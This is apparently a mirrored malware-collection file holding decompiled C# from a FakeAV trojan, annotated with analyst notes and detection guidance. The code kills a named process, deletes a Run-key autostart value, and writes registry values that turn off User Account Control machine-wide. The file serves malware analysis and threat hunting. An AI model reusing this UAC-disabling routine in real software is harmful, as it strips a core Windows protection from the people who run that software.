mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
f2ac1ece55
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.pharmantiga
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
namespace Pharming_V4
{
  // Analyst notes (decompiled sample; the file header labels it Trojan.Win32.FakeAV).
  //
  // [StandardModule] and the ProjectData calls come from Microsoft.VisualBasic, so the
  // original was most likely a VB.NET Module. The method sharing its name with the class
  // is a decompiler artefact of that: C# rejects a member named like its enclosing type,
  // so this listing is for reading, not for compiling.
  //
  // Host artefacts visible in this routine, useful as hunting pivots:
  //   - process name                       "windowsfiledk"
  //   - HKCU ...\CurrentVersion\Run value  "www.msn.com"
  //   - HKLM ...\Policies\System           EnableLUA        <- 0
  //   - HKLM SOFTWARE\Microsoft\Security Center  UacDisableNotify <- 0
  [StandardModule]
  internal sealed class pharmantiga
  {
    // Runs four steps in order: kill a named process, delete one autostart value,
    // then write two UAC-related registry values under HKLM.
    //
    // NOTE(review): the first two steps look like removal of an earlier install of the
    // same family (process plus its Run entry); that is inferred from the names only and
    // is not confirmed by anything in this file.
    public static void pharmantiga()
    {
      // Step 1: terminate every process called "windowsfiledk".
      // Any failure (access denied, process already gone) is swallowed through the
      // VB error-state helpers, so the routine always continues to step 2.
      try
      {
        foreach (Process running in Process.GetProcessesByName("windowsfiledk"))
        {
          running.Kill();
        }
      }
      catch (Exception killError)
      {
        ProjectData.SetProjectError(killError);
        ProjectData.ClearProjectError();
      }

      // Step 2: delete the per-user autostart value "www.msn.com".
      // A missing key or value raises inside the try and is swallowed the same way.
      // Detection: an autostart value named like a web domain is unusual on its own;
      // both its creation and its deletion show up in registry auditing of the Run key.
      try
      {
        RegistryKey userRunKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        userRunKey.DeleteValue("www.msn.com");
      }
      catch (Exception runKeyError)
      {
        ProjectData.SetProjectError(runKeyError);
        ProjectData.ClearProjectError();
      }

      // Step 3: EnableLUA = 0 turns User Account Control off machine-wide; Windows
      // applies the change at the next restart.
      // Unlike steps 1 and 2 this is NOT wrapped in try/catch: opening HKLM for write
      // needs an elevated token, and a failure here propagates to the caller.
      // Detection/mitigation: alert on any write to this value (registry value-set
      // telemetry such as Sysmon event 13, or object-access auditing on the key) and
      // pin EnableLUA through policy so drift is reverted. Commonly mapped to
      // ATT&CK T1548.002 and T1112.
      RegistryKey systemPolicyKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", true);
      systemPolicyKey.SetValue("EnableLUA", (object) 0);
      systemPolicyKey.Close();

      // Step 4: write UacDisableNotify = 0 under the Security Center key.
      // NOTE(review): samples that hide the "UAC is off" Security Center warning are
      // usually reported writing 1 here; with 0 the intended effect is unclear, so treat
      // the write itself (not the value) as the indicator. Confirm against the Windows
      // version under analysis.
      // Also outside any try/catch, and the key handle is not closed if SetValue throws.
      RegistryKey securityCenterKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Security Center", true);
      securityCenterKey.SetValue("UacDisableNotify", (object) 0);
      securityCenterKey.Close();
    }
  }
}